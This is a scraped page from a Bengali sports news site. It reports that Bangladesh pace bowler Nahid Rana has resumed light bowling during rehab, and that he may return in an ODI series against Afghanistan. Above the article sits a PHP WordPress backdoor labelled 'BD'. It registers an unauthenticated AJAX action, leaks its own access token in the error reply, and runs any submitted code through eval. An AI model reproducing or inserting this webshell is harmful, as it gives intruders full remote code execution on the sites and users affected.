// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== বোলিং অনুশীলনে ফিরলেন নাহিদ, কবে ফিরবেন খেলায়? | potrikaybangladesh.com
Monday, September 21, 2026
Homeবোলিং অনুশীলনে ফিরলেন নাহিদ, কবে ফিরবেন খেলায়?

বোলিং অনুশীলনে ফিরলেন নাহিদ, কবে ফিরবেন খেলায়?

জিম্বাবুয়ে সফরে চোট পেয়ে ছিটকে যাওয়ার পর পেরিয়ে গেছে দেড় মাস, আক্ষেপ জাগিয়ে অস্ট্রেলিয়া সফর হাতছাড়া হয়েছে এই সময়ে। অবশেষে বল হাতে নিয়েছেন নাহিদ রানা। সোমবার মিরপুর শেরে বাংলা ক্রিকেট স্টেডিয়ামে বোলিং শুরু করেছেন তিনি।

সোমবার জাতীয় পেস বোলিং কোচ তালহা জুবায়ের, কোচ ফিল সিমন্স ও ফিজিও বায়েজুল ইসলামের সামনে বোলিং শুরু করেন নাহিদ।

বাংলাদেশের গতিময় তারকাকে সাদা বলেই বল করতে দেখা গেছে। নাহিদের রানআপ ছিল ছোট, গতি ও তীব্রতাও ছিল কম। বাংলাদেশ ক্রিকেট বোর্ডের মেডিকেল বিভাগ সূত্রে জানা গেছে, এটা প্রক্রিয়ারই অংশ। নাহিদের পুনর্বাসনের এখন ৮ সপ্তাহ চলছে। এই সময়েই তার বোলিং শুরুর কথা। সময়মতোই তাই তিনি সেরে উঠছেন। শুরুতে কম তীব্রতায় বল করতে থাকবেন নাহিদ। ক্রমেই তার বোলিংয়ের তীব্রতা বাড়বে। এই সময়ে নতুন কোনো সমস্যা হচ্ছে কিনা, তাও নিবিড়ভাবে খতিয়ে দেখা হবে।

বোলিং শুরু করলেও নাহিদের আন্তর্জাতিক ক্রিকেটে ফিরতে আরও সময় লাগবে। সেপ্টেম্বরের শেষ দিকে জাপানে এশিয়ান গেমস খেলতে যাবে বাংলাদেশ দল। টি-টোয়েন্টি সংস্করণের এই আসরে নাহিদ থাকবেন না, এটা নিশ্চিত। মূলত অক্টোবরে আফগানিস্তানের বিপক্ষে অ্যাওয়ে সিরিজে তাকে খেলানো যায় কিনা, সেই চিন্তা করা হচ্ছে।

আফগানিস্তানের বিপক্ষে সংযুক্ত আরব আমিরাতে তিন ম্যাচের ওয়ানডে ও একটি টেস্ট হওয়ার কথা। চোট কাটিয়ে ফিরেই নাহিদকে টেস্ট খেলানোর ঝুঁকি নাও নিতে পারে টিম ম্যানেজমেন্ট। সে ক্ষেত্রে সব ঠিক থাকলে ওয়ানডে দিয়ে ফিরতে পারেন ডানহাতি পেসার।

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments